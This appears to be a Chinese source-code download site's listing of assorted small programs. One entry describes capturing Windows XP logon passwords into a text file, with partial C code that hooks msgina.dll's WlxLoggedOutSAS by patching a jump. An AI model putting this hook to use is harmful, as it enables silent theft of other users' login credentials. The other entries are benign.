-
演示使用控制窗口动态库和钩子动态库的程序
演示使用控制窗口动态库和钩子动态库的程序-Demonstration of the use of the control window and hook DLL DLL procedures
- 2022-10-17 13:45:02下载
- 积分:1
-
虚拟代理服务器的源程序,很简单的
虚拟代理服务器的源程序,很简单的-Virtual Proxy Server source, a very simple
- 2022-07-27 11:34:46下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
i.MX27_ADS_BSP_15_Windows_Embedded_CE_6_Reference_Manual I.MX27 use the latest d...
i.MX27_ADS_BSP_15_Windows_Embedded_CE_6_Reference_Manual I.MX27 最新的WINCE6.0 BSP使用说明文档-i.MX27_ADS_BSP_15_Windows_Embedded_CE_6_Reference_Manual I.MX27 use the latest documentation WINCE6.0 BSP
- 2023-07-15 07:25:04下载
- 积分:1
-
下载中国彩票网上双色球所有历史中奖号码
使用python下载中国彩票网上,历年来双色球的所有中奖号码。目前中国彩票网使用的是静态网页,历年来的双色球中奖号码才80多页,目前定义了80页已经能够下载全部号码,如果网站调整,代码稍加改动即可。
- 2022-02-04 08:09:22下载
- 积分:1
-
一个计算器的源代码,适合参考
一个计算器的源代码,适合参考-a calculator source code for reference
- 2023-04-09 20:50:03下载
- 积分:1
-
reading and writing large documents
读写大块资料文件-reading and writing large documents
- 2023-08-09 01:40:03下载
- 积分:1
-
用这个程序可以测试在每一阶段当前电池的电量,电流变化状况 (用在智能开发上,例如PocketPC,WinCE)...
用这个程序可以测试在每一阶段当前电池的电量,电流变化状况 (用在智能开发上,例如PocketPC,WinCE)-use of this procedure can be tested at every stage of the current battery capacity. Current conditions (used in the smart development, such as PocketPC, WinCE)
- 2022-09-13 10:25:03下载
- 积分:1
-
This is a 16
这是一个16位的汇编简单的能进行加减乘除四则运算的简单计算器-This is a 16-bit compilation of a simple addition and subtraction multiplication and division to carry out four operations in a simple calculator
- 2022-10-10 20:50:03下载
- 积分:1
-
该系统可以实现对存储系统的基本操作,用户可以自由。
本系统可以实现仓库系统的基本操作,前台有用户的注册登陆,后台有数据的基本操作-This system can realize the basic operation of the storage system, users have Front Desk Registration landing, there is the background of the basic operation of data
- 2022-05-27 09:39:39下载
- 积分:1